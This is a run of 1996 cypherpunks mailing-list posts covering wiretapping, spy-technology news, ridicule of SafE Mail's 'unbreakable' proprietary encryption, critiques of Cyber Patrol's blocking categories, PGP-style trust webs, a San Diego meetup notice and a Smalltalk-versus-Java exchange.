if you get the opportunity, check out the beyond 2000, nextstep and invention shows on the discovery channel. albeit, they may be a bit dated, the stuff is often enlightening. tuit, r&d of stunguns, dazzlers, flypaper, tanglers and lo-grade chemical agents has been underway for some time in labs arouns the world. lethality is not as popular as it once was. some of these devices do, however, work through excruciating, if nondamaging, pain.

tony

----------
From: 	John Young[SMTP:jya@pipeline.com]
Sent: 	Saturday, June 15, 1996 10:33 PM
To: 	cypherpunks@toad.com
Subject: 	Non-Lethal Terrorism

 
                      NON-LETHAL TECHNOLOGIES 
                 Military Options and Implications 
                Report of an Independent Task Force 
 
   http://pwp.usa.pipeline.com/~jya/nltech.htm  (47 kb) 
 
   Beware snooping, consider using the anonymizer at: 
 
   http://www.anonymizer.com 
 
   ----- 
 
   Or, if http fails, NLT_ech to <jya@pipeline.com> 
 
 
 
 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Tue, 18 Jun 1996 12:53:09 +0800
To: attila <attila@primenet.com>
Subject: Re: You bet they have/are: NSA/CIA to snoop INSIDE the U.S.???
In-Reply-To: <199606090736.AAA29479@primenet.com>
Message-ID: <199606172205.PAA06449@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> anyone who believes the FBI and a host of other U.S. agencies even 
> less scrupulous does not wiretap without permits, has been standing behind 
> the door. generally, it does not matter if the information learned is 
> admissable in court  --they never admit wiretapping in the first place as  
> the agency themselves, in many cases, *did*not*wiretap*  --but the agency 
> does buy info from usually unsavory "contractors" who do wiretap.

Here is where I'm totally amazed (aghast ... maybe I'm just too naive):
(And, yes, I have asked this question, in different words, to a lawyer
crowd.)

It is clear that if the FBI/CIA/NSA/ATF/DoS intercepts a message with
some very important content, like, say, I (Ernest Hua) was plotting to
kill Hillary, then they can use that information to start investigating
my activities, even if the intercept turned out to be illegal.  Those
who saw the content of this intercept is not required by law to "forget"
that they ever saw it.

In this day and age, having discretionary access to information is a lot
of power which the average citizen does not have.  Even just the ability
for an entity to see information which it legally may not intercept
gives that entity a lot more power than I would ever want to grant them.
I am sure a networked video camera in every room, street corner, and
passenger car is one of the FBI's wet dreams.

No thanks.

Human beings are human beings, and we all have flaws.  That is why there
are companies in Britain selling videos of people caught in the act of
doing something private in a public place.

(Of course, if I were Hillary in this scenario, then I would wish that
the FBI/et al has god-like powers to do anything to stop me, but that
would be an emotionally charged argument and not a rational one.)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 18 Jun 1996 07:08:03 +0800
To: cypherpunks@toad.com
Subject: Spy Tech
Message-ID: <199606171533.PAA14512@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Three feathers for spying technology: 
 
   TST: "MI6 stole secrets from French navy." 
 
      Top secret technology for tracking nuclear submarines 
      has been stolen from a French naval base by MI6, 
      Britain's foreign intelligence service, after a French 
      civilian engineer was paid thousands of pounds to betray 
      one of his country's most closely guarded secrets to an 
      MI6 front company which posed as a technical defence 
      consultancy and publishing house. 
 
   TST: "High-flying gliders replace satellites." 
 
      Solar powered gliders circling above cities could 
      provide a cheap alternative to satellites for global 
      communication systems, according to a group of American 
      scientists. 
 
   WaJo: "Israel Asks White House to Place Curbs On 3 U.S. 
   Satellite-Surveillance Firms." 
 
      The request is regarded as "very sensitive," according 
      to one U.S. official, because Israeli officials say it 
      relates to their national security concerns. However, 
      officials of the affected U.S. companies charge it 
      amounts to unfair competition because an Israeli company 
      is about to enter the space surveillance business and it 
      wouldn't face similar restrictions. 
 
 
   http://pwp.usa.pipeline.com/~jya/tekspy.txt  (18 kb) 
 
   Spy surf: http://www.anonymizer.com 
 
   Or, TEK_spy 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 18 Jun 1996 07:30:20 +0800
To: cypherpunks@toad.com
Subject: The Ultima Spy Book
Message-ID: <199606171540.PAA14807@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Ultimate Spy Book 
   by H. Keith Melton 
   (Dorling Kindersley, London) 
   DK Publishing, New York 
   First American edition, 1996. $29.95. 
   ISBN 0-7894-0443-5 
 
   Over 600 illustrations of the tools and tricks of spycraft 
   for killing, betraying, deceiving, surveilling, encrypting, 
   decrypting, communicating, burgling, recruitment and 
   training, fucking up and rotting in jail, and flacking spy 
   fluff until tip-canoe-ed. 
 
--------- 
 
   Eye pix of cipher devices: 
 
   Kryha, Bolton, Hebern, M-94:      
 
      http://pwp.usa.pipeline.com/~jya/cd1.jpg 
 
   Hagelin's M-209 and CD-57: 
 
      http://pwp.usa.pipeline.com/~jya/cd2.jpg 
 
   Enigma: 
 
      http://pwp.usa.pipeline.com/~jya/enigma1.jpg 
 
   Enigma innards and Geheimschreiber: 
 
      http://pwp.usa.pipeline.com/~jya/enigma2.jpg 
 
   Purple: 
 
      http://pwp.usa.pipeline.com/~jya/purple.jpg 
 
---------- 
 
   CYA: http://www.anonymizer.com 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 18 Jun 1996 12:36:07 +0800
To: richieb@teleport.com
Subject: Re: Snake Oil on the Water...
Message-ID: <1.5.4.32.19960617204240.00679dc0@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 PM 16-06-96 -0700, it was written:

>>At the following two sites, you may download the FREEWARE Pegasus Mail
>>program version 2.3.3 16 bit for windows 3.x or a version for WIN95.
>
>I like Pmail.  Had I not been an experienced Eudora user before I
>tried it (and pretty stuck on the Eudora interface) I would have
>probably stuck with it.  Kudos to the Pegasus team for releasing
>a freeware program with such excellent filtering capabilites.  It
>is much more of a full-fledged program than Eudora Lite, IMHO.
>
>> The
>>unique thing about it, besides its simplicity and that it's a great mail
>>program better than Eudora, it has a built in encryption program that is as
>>effective as PGP and lots simpler. All you do is agree on a password with
>>your correspondent. That simple.

The "encryption" built into PMail is - and the author admits
this - crap.  He wrote the encryptor interface, which is
essentially Message XOR Password, as a demonstration.  Then
the JN PGP interface was written.

>> The encryption program and the mail program
>>were developed in New Zealand, and were legally imported, so the encryption
>>program is better than PGP, which is regulated by Federal Cypher Laws.
>
>This is misleading, IMHO.

Mild understatement.

>PC users who use PGP should try Pegasus and PGP JN.

Been there, done that.  It's a nice combo, but could
be a little better.

>Private Idaho is available from Joel McNamara's page, at:
>http://www.eskimo.com/~joelm/

Been there, done that.  It's also a nice program, but
nowhere near a full featured mail client.  That's
by design, as I understand.


dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 18 Jun 1996 14:05:54 +0800
To: vipul@pobox.com
Subject: Re: pretty good reputation
Message-ID: <199606172256.PAA09652@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are some references to the material on reputations I mentioned
before.

ftp://prospero.isi.edu/pub/papers/security/insurance-cccs94.ps
     * Charlie Lai, Gennady Medvinsky, and B. Clifford Neuman.
       Endorsements, Licensing, and Insurance for Distributed System
       Services, In Proceedings of 2nd the ACM Conference on Computer and
       Communication Security November 1994.

This discusses some concepts related to extending trust relationships
through a network.

ftp://research.att.com/dist/mab/policymaker.ps
	"Decentralized Trust Management" by Matt Blaze et al

This suggests a formal way of specifying trust relationships among keys.
In effect you have little programs that get activated by certain keys, or
by certain signatures.  It is a very flexible methodology which could be
adapted to many ways of specifying trust relationships.

http://theory.lcs.mit.edu/~rivest/sdsi.ps (or .tex)
	"Simple Distributed Security Infrastructure" by Ron Rivest and
	Butler Lampson

This is a key certificate structure which is somewhere between a
hierarchical and a web of trust system, somewhat influenced by Blaze's
ideas.  It is pretty limited though in the kinds of trust delegation it
allows.  You can accept another person's signatures on specific keys but
you can't mark him as a generally-accepted signer.  However you can
develop chains of signatures as in PGP and perhaps some extra mechanism
could be used to decide when to trust them.

Hal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 18 Jun 1996 12:57:25 +0800
To: cypherpunks@toad.com
Subject: Rating Problems
Message-ID: <2.2.32.19960617201720.00753fc0@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent CDA decision pointed out some of the problems involved in rating
Net content.  For example, the court spent a lot of time talking about Cyber
Patrol software and the CyberNOT list "containing approximately 7000 sites
in twelve categories.  The software is designed to enable parents to
selectively block access to any or all of the twelve CyberNOT categories
simply by checking boxes in the Cyber Patrol Headquarters (the Cyber Patrol
program manager).  These
categories are:"

          Violence/Profanity:  Extreme cruelty, physical or
          emotional acts against any animal or person which are
          primarily intended to hurt or inflict pain.  Obscene
          words, phrases, and profanity defined as text that uses
          George Carlin's seven censored words more often than
          once every fifty messages or pages.

Violence against plants is OK, however.  Likewise Cypherpunks which probably
meets the 1 bad word per 50 messages standard.  I wonder if they use
Carlin's original or updated 7 Words.

          Partial Nudity:  Full or partial exposure of the human
          anatomy except when exposing genitalia.

          Nudity:  Any exposure of the human genitalia.

Only in pictures.  Text-only full-frontal nudity is OK.  Looks like baby
pictures are out though.

          Sexual Acts (graphic or text):  Pictures or text
          exposing anyone or anything involved in explicit sexual
          acts and lewd and lascivious behavior, including
          masturbation, copulation, pedophilia, intimacy and
          involving nude or partially nude people in
          heterosexual, bisexual, lesbian or homosexual
          encounters.  Also includes phone sex ads, dating
          services, adult personals, CD-ROM and videos.

Bestiality is not covered though.

          Gross Depictions (graphic or text):  Pictures or
          descriptive text of anyone or anything which are
          crudely vulgar, deficient in civility or behavior, or
          showing scatological impropriety.  Includes such
          depictions as maiming, bloody figures, indecent
          depiction of bodily functions.

There goes all of Pop Culture.  Certainly deficient in behavior.

          Racism/Ethnic Impropriety:  Prejudice or discrimination
          against any race or ethnic culture.  Ethnic or racist
          jokes and slurs.  Any text that elevates one race over
          another.

Luckily, all other forms of discrimination are OK.  Women, crips, queers,
Jews, and old folk watch out.  How politically incorrect of Cyber Patrol. 

          Satanic/Cult:  Worship of the devil; affinity for evil,
          wickedness.  Sects or groups that potentially coerce
          individuals to grow, and keep, membership.

Does that include evangelicals?  They're not Satanic but they certainly
encourage membership growth.  Some evangelicals can be quite coercive.  And
why Satanists?  Don't we have freedom of religion in this country?
Remember, the Supremes *did* throw out the Hialeah Sanitaria Animal
Sacrifice Ordinance.

          Drugs/Drug Culture:  Topics dealing with the use of
          illegal drugs for entertainment.  This would exclude
          current illegal drugs used for medicinal purposes
          (e.g., drugs used to treat victims of AIDS).  Includes
          substances used for other than their primary purpose to
          alter the individual's state of mind such as glue
          sniffing.

I'm glad my drug pages are limited to the non-entertaining uses of illegal
drugs.  Purely analgesic purposes only.

          Militant/Extremist:  Extremely aggressive and combative
          behaviors, radicalism, advocacy of extreme political
          measures.  Topics include extreme political groups that
          advocate violence as a means to achieve their goal.

There goes www.whitehouse.gov.  They certainly "advocate violence as a means
to achieve their goal."  Pretty aggressive and combative as well.  Radical.
Advocate extreme political measures.

          Gambling:  Of or relating to lotteries, casinos,
          betting, numbers games, on-line sports or financial
          betting including non-monetary dares.

There goes www.wsj.com.  *All* financial betting.

          Questionable/Illegal:  Material or activities of a
          dubious nature which may be illegal in any or all
          jurisdictions, such as illegal business schemes, chain
          letters, software piracy, and copyright infringement.

Which jurisdictions -- Singapore?  Do they mean just US jurisdictions or all
jurisdictions.  Is offshore banking dubious?  It's not illegal.

          Alcohol, Beer & Wine:  Material pertaining to the sale
          or consumption of alcoholic beverages.  Also includes
          sites and information relating to tobacco products.

Poor Joe Camel.  If Health Nazis are bad for adults, why are they good for
children?  Note guns aren't on the banned list so www.nra.org is safe for
the kiddies.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Tue, 18 Jun 1996 16:16:21 +0800
To: dsmith@prairienet.org
Subject: Re: Snake Oil on the Water...
Message-ID: <199606180000.RAA28399@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: dsmith@prairienet.org, cypherpunks@toad.com
Date: Mon Jun 17 18:59:49 1996
They have started mentioning the product on their web pages and provide a 
link to the beta site for sign-ups etc.  Since 6.x I have not yet 
experienced a product crash, except with a disk full condition which was 
reported to them earlier today.  BTW, would you be interested in setting up 
a secure channel for testing?

Lou Z.

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMcXxrctPRTNbb5z9AQGfwAgAn7PYnixstxM13Bm6/VTEJp0J7b7e4kh8
evPhPIrsfgWskZzQY/YJtNtaV8p7hphPMeOewGpZ/lXhuPPZeHwLWmFTx/cmX5po
g8imoxfwPheHaVtj2R2mdvEyL7Xfiz/YZDJ2E9pyqN7euIrx+xPwbDVqedv87TC3
sFwJecbSpAmGwR2f5V7SrVx+uQcdQ+NzUyOhcToYRnbl7gydEyuGQpQNpn7uyi8S
fpvqyoKMwU/ki6xLKIHBPmp8ZQK0AeWnOQl80oGbG7jUGveW9ESs5BwrtXSQPDlI
4SXv1T1UGlVF+DtLFgGHP5agGhl4KT+c5z4ZUTc+BzqSs5aqYmB8yA==
=4txl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 18 Jun 1996 13:32:53 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Rating Problems
In-Reply-To: <2.2.32.19960617201720.00753fc0@popserver.panix.com>
Message-ID: <31C5D761.718@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> The recent CDA decision pointed out some of the problems involved in
> rating Net content.  

That reminds me.  As someone who hasn't yet given up on WiReD in disgust
(instead, I get it and read it faithfully in disgust), I was particularly
pissed-off at the latest "Kids Net Rights" issue.  Jonathan Katz
huffs and puffs about how "nobody in the digital world" protests the
idea of rating schemes to keep non-adults away from information, and 
indeed claims that "the digerati" (grrr) are pushing rating schemes with
great gusto to save themselves from censorship.

I guess by "nobody", he probably means "nobody who hangs out in the same
trendy espresso bars as the WiReD trendmeisters".  I've seen plenty of
invective directed at the concept of rating systems in general, from
a variety of people including Tim May and li'l ol' me.  That's been here
and on some various newsgroups.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: safemail@ntrnet.net (M.Wagoner (1))
Date: Tue, 18 Jun 1996 12:33:14 +0800
To: cypherpunks@toad.com
Subject: SafE Mail Corporation
Message-ID: <199606172121.RAA00883@ns1.ntrnet.net>
MIME-Version: 1.0
Content-Type: text/plain



We would like someone to be able or should I say try and crack our
encryption. IT IS IMPOSSIBLE.




Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.



Randy Estridge
SafE Mail Corporation  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 18 Jun 1996 17:15:10 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <2.2.32.19960618002536.007510d8@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 05:21 PM 6/17/96 -0400, M.Wagoner (1) wrote:
>
>We would like someone to be able or should I say try and 
>crack our encryption. IT IS IMPOSSIBLE.

>Our Web site is http://www.sfmc.com  Phone number is 
>1-800-252-9938.

So I pulled up the Web site to see what sort of reward they
offered to the successful cracker.  Under the heading 
"Attention `Hackers'" they said if you crack their 
unbreakable SafE Mail code, you get 5 free copies of ...
SafE Mail!  Oh, that's a really primo prize, broken 
software.  Duh.

Since cracking their encryption is IMPOSSIBLE, I suggest 
they make the stakes interesting--$100,000, or hell, a cool
million.  After all, it's unbreakable.  It's not like they
will have to pay up or anything.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 18 Jun 1996 13:25:51 +0800
To: ichudov@algebra.com
Subject: Politeness, trust and ice cream.
In-Reply-To: <199606090728.CAA21978@manifold.algebra.com>
Message-ID: <Pine.3.89.9606171623.C15968-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 9 Jun 1996 ichudov@algebra.com wrote:

Fascinating stuff about polite gun-owners deleted.

> If we think about anonymous computer contractors and anonymous
> employers, the interesting question is how to maintain reputations and
> how to check references.

I think it comes down to "who watches the watchers". Do you trust 
Business Week's ratings of so and so management consultant? Do you trust 
The Cypherpunk Guide To Business Magazines's ratings of Business Week's 
ratings of consultants? How about Joe Usenet's assessment of the above on
misc.stocks.slander? This begins to resemble the problem of the pgp Web 
of Trust. This problem already exists in the non-anonymous 
flesh-and-paper world. Who do you trust to tell you who to trust (and so on)?
Do you trust journalists who take ad money?

Presumably, once a decent profit model evolves for net publishing, there 
will be some incentive for customers to give you their opinions, and for 
others to gather them. Do you have a clear path of trust (or faith 
or some other quality) proceeding either to them or to their stated 
customers? 

I forsee many variations of trust webs to determine the quality of
ratings. Eg. I am 50% in agreement with Hal's taste in ice cream, 10% in
agreement with Declan's and 75% with the Economist's. I have signed this
with my key. Do the math to see how much you trust my assessment of Tim
Horton's chocolate pecan fudge. You decide how to do the math. Tim and Hal
had some really nice articles on this last month 

---Begin PGC Comment---
KeyID 0xF00

C1: Payment-Statement: I have not been payed to make the above 
endorsement.

C2: Coercion-Statement: I have not been coerced into making the above 
statement  

---Begin PGC Signature---
13235097u13251-9233u5v123rsdf;lkhjs -882351932u4v
---End   PGc Signature---
Pretty Good Commentary is a copyrighted trademark of KeyID 0xF00
---End   PGC Comment---

Reminds me that I should grab an AI book real soon now. 

Another thing one could use is a pseudonymous open-booking protocol (I 
didn't read Eric's post, so I don't know if it's any good) to determine 
if alleged customers are the real article. Offhand, I'd venture a guess 
that we'd see the above problem again, which hints at the importance of a 
good generalized trust or agreement calculus (and calculator) for formalized 
comments.

I don't want to imagine how bad the traffic will get on IETF mailing 
lists to standardize trust comments. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 18 Jun 1996 13:06:59 +0800
To: cypherpunks@toad.com
Subject: [whoops]Re: Politeness...
In-Reply-To: <Pine.3.89.9606171623.C15968-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.3.89.9606171731.D15968-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 17 Jun 1996 I wrote:

> I don't want to imagine how bad the traffic will get on IETF mailing 
> lists to standardize trust comments. 

Whoops. Mental laziness, replace trust with belief throughout that post.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ncr.com>
Date: Tue, 18 Jun 1996 15:19:56 +0800
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <2.2.32.19960617222426.00758244@opus.SanDiegoCA.NCR.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, June 20th, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical CP stuff.  There's always the semi-topical discussions; Internet
Service Provider in San Diego (providing, anonymous remailers and other
privacy services), stelth communications, latest Cypherpunk goings-on,
Internet happenings (like recent Federal court decision).

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your key fingerprint.

Drop me a note if you plan to attend.


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.NCR   .Com   ...(*)/(*).        CI$: 76340.2422
http://bordeaux.sandiegoca.ncr.com/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 18 Jun 1996 13:45:28 +0800
To: safemail@ntrnet.net (M.Wagoner (1))
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606172121.RAA00883@ns1.ntrnet.net>
Message-ID: <199606172238.SAA20263@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



M.Wagoner (1) writes:
> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.
> 
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> 
> Randy Estridge
> SafE Mail Corporation  

I checked the web site, and found the following snake oil aroma
(caused largely by the idiotic commentary and the word "proprietary"
on the encryption algorithm...)

------
* SafE Mail utilizes a short 22 character Public Key which I realize
  is "great" for key exchange. Does this short Public Key the
  encription code vulnerable to attack?

       No! The Public Key is generated by a "One Way Hash Function"
       when the owner of the software names a private key or
       passwords. This makes the encryption code secure and not
       vulnerable to attack by unautorized individuals.

[Perry's comments: 1) personal pet peve -- using quote marks for
emphasis. 2) Er, whats this crap? I understand perhaps generating RSA
keys off of a passphrase, but that wouldn't help you with key
exchange -- your public key is 1024 bits no matter what you do. As for
the rest...]
[...]
* Is Safe Mail really secure?

       We believe so. Unlike other encryption software, SafE Mail,
       through its proprietary encryption algorithm, leaves neither a
       backdoor nor a master key for any third party decryption of an
       encrypted file. To achieve extra security, SafE Mail allows an
       unlimited number of multiple encryptions without corrupting the
       original file. The output encrypted file bears no hint to the
       size or type of the original file
[Perry's comments: Yeah, like PGP has a back door or anything, or like
it prevents superencipherment, or like it leaks what your file was...]
-------

Having read the web site, the thing looks like it offers no advantage
at all over PGP and that it might be a piece of junk. I say stick with
whats known to be good and is free. PGP's price is certainly right,
especially when you consider what crap the "commercial" stuff like
this usually is.

Oh, and to the folks at Safe Mail: I will happily test out the quality
of your software for my standard consulting rate. My time is, however,
too valuable to waste on stuff like this without being paid. If other
people want to have a good time testing your product out, let them
feel free.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 18 Jun 1996 15:10:58 +0800
To: frissell@panix.com
Subject: Re: Rating Problems
Message-ID: <199606172345.SAA07563@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


> The recent CDA decision pointed out some of the problems involved in 
rating
> Net content.  For example, the court spent a lot of time talking about
>  Cyber
> Patrol software and the CyberNOT list "containing approximately 7000 
sites

Do we just ignore the fact that these lists are outdated within
seconds of release?  Even if they can be automatically distributed
via the net (maybe by forcing your Web browser to use their page
as your home page and automagically downloading to you a new update),
the list will still be outdated by days or weeks.  This is one of
the big problems with all of these types of filters.

>           Violence/Profanity:  Extreme cruelty, physical or
>           emotional acts against any animal or person which are
>           primarily intended to hurt or inflict pain.  Obscene
>           words, phrases, and profanity defined as text that uses
>           George Carlin's seven censored words more often than
>           once every fifty messages or pages.

Gee, is this real or simulated violence?  I don't suppose I can
go surfing over to the Mortal Kombat website now...
 
>           Satanic/Cult:  Worship of the devil; affinity for evil,
>           wickedness.  Sects or groups that potentially coerce
>           individuals to grow, and keep, membership.
> 
> Does that include evangelicals?  They're not Satanic but they certainly
> encourage membership growth.  Some evangelicals can be quite coercive.  
And
> why Satanists?  Don't we have freedom of religion in this country?
> Remember, the Supremes *did* throw out the Hialeah Sanitaria Animal
> Sacrifice Ordinance.

What about Co$?  They might be a cult, depending upon who you ask.
And, what about us harmless, life-affirming Witches?  The name
alone will probably trigger a lot of filters.


I think the point of all this is that unless/until a "smart" filter can
be devised, there can't / won't be a good filtering package that will
please everyone, or even a majority of someones.  Good luck.

dave



----- David E. Smith, dsmith@prairienet.org
PO Box 324 Cape Girardeau MO USA 63702-0324
http://www.prairienet.org/~dsmith/dave.html
"fighting ultimage cosmic evil...
           ... one bean burrito at a time."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 18 Jun 1996 09:51:37 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Remailer Operator Liability?
In-Reply-To: <2.2.32.19960617134543.00766238@popserver.panix.com>
Message-ID: <Pine.PCW.3.94.960617184654.7343B-100000@CISPPP>
MIME-Version: 1.0
Content-Type: text/plain


I've heard and used mail exploder before. Usually it's with the
connotations of a piece of software or equipment, rather than a list of
names - they're not synonyms.

Simon

On Mon, 17 Jun 1996, Duncan Frissell wrote:

> At 08:43 AM 6/17/96 -0400, Declan B. McCullagh wrote:
> 
> >I believe we used the term "email exploder" instead of "mailing list,"
> >particularly in cross-examination and closing arguments, to convey the
> >idea that such a device is often used for conversation, not just one-way
> >communication.
> 
> Was this term invented during the hearings or has anyone heard of it before?
> 
> DCF
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 18 Jun 1996 14:28:05 +0800
To: cypherpunks@toad.com
Subject: Damn, that snake oil is tasty! [was Re: SafE Mail Corporation]
Message-ID: <199606180011.TAA10450@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.
> 

Mmmm... flamebait.

> 
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> 

The highlights:

>
>Because we believe our encryption algorithm for SafE Mail
>is so strong and unbreakable, we will offer five free copies
>of SafE Mail or cash equivalent, to anyone capable of cracking
>a SafE Mail encrypted file. 

Uh, okay... but, uh, if we break the encryption, doesn't
that make the package damn near useless?


Also, they charge $40 (!!) shipping and handling for their
free demo.  



----- David Smith, Thinker Of Deep Thoughts :)
http://www.prairienet.org/~dsmith/library.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 18 Jun 1996 14:39:47 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: Java
In-Reply-To: <199606042238.SAA09594@jekyll.piermont.com>
Message-ID: <Pine.3.89.9606171924.B20059-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 4 Jun 1996, Perry E. Metzger wrote:

> Who said anything about C, Detweiler. Smalltalk. Scheme. Postscript. 
> There are dozens of them out there. All of them are totally machine
> independent. You could run Smalltalk images byte for byte identical on
> large numbers of different processors years and years and years
> ago. Byte codes aren't new either -- Smalltalk's virtual machine, PSL
> and others had them decades ago.

One thing that might distinguish Smalltalk's comparative market faliure from 
Java's apparent market success, apart from the hype, is the lack of a 
free implementation for windows or even an easy to use free version for 
dos (both of the dos ones I tried failed to work for some reason).

A good free class lib for net programming and GUI programming would have
helped too (something more substantial than the windowing primitives it
comes with). Java has all these things. (One thing that detractors of
Smalltalk claim is that it is slow--slower than Java. However there is a
research dialect from Sun called Self which is supposed to be 50% as fast
as C.)

Also if one looks on the commercial side of things, developper versions
(which are wonderful) are much more expensive than the equivalent visual
basic (having purchased and tried a cheaper smalltalk for a course, I
would have far preferred staying with it rather than c++ or VB. Hopefully
Java does what it couldn't. However it is never too late, there is always
market for very easy to learn and program OO languages that aren't c++.
If you care so much Perry, you could always give it a try.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Tue, 18 Jun 1996 16:48:23 +0800
To: cypherpunks@toad.com
Subject: Pickle Angels?!?  (Humour)(Noise)
Message-ID: <Pine.SUN.3.91.960617192342.11481A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On today's Sally Jesse Raphel was Curtis Swiva?
founder of the Guardian Angels talking about his new record
of eating pickles.  He plans to break the record for eating 
22 hot dogs in 12 minutes.  The whole rest of the stage was
full of drag queens, and other rejects from the Jerry Springer
show.  Curtis must be really hard up to get his mug on TV! 


William Knowles
erehwon@c2.org

--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 18 Jun 1996 17:02:44 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Britain to control crypto - official (fwd from Usenet)
In-Reply-To: <199606112007.QAA01167@nrk.com>
Message-ID: <Pine.SUN.3.91.960617193805.12894B@tipper.oit.unc.edu>
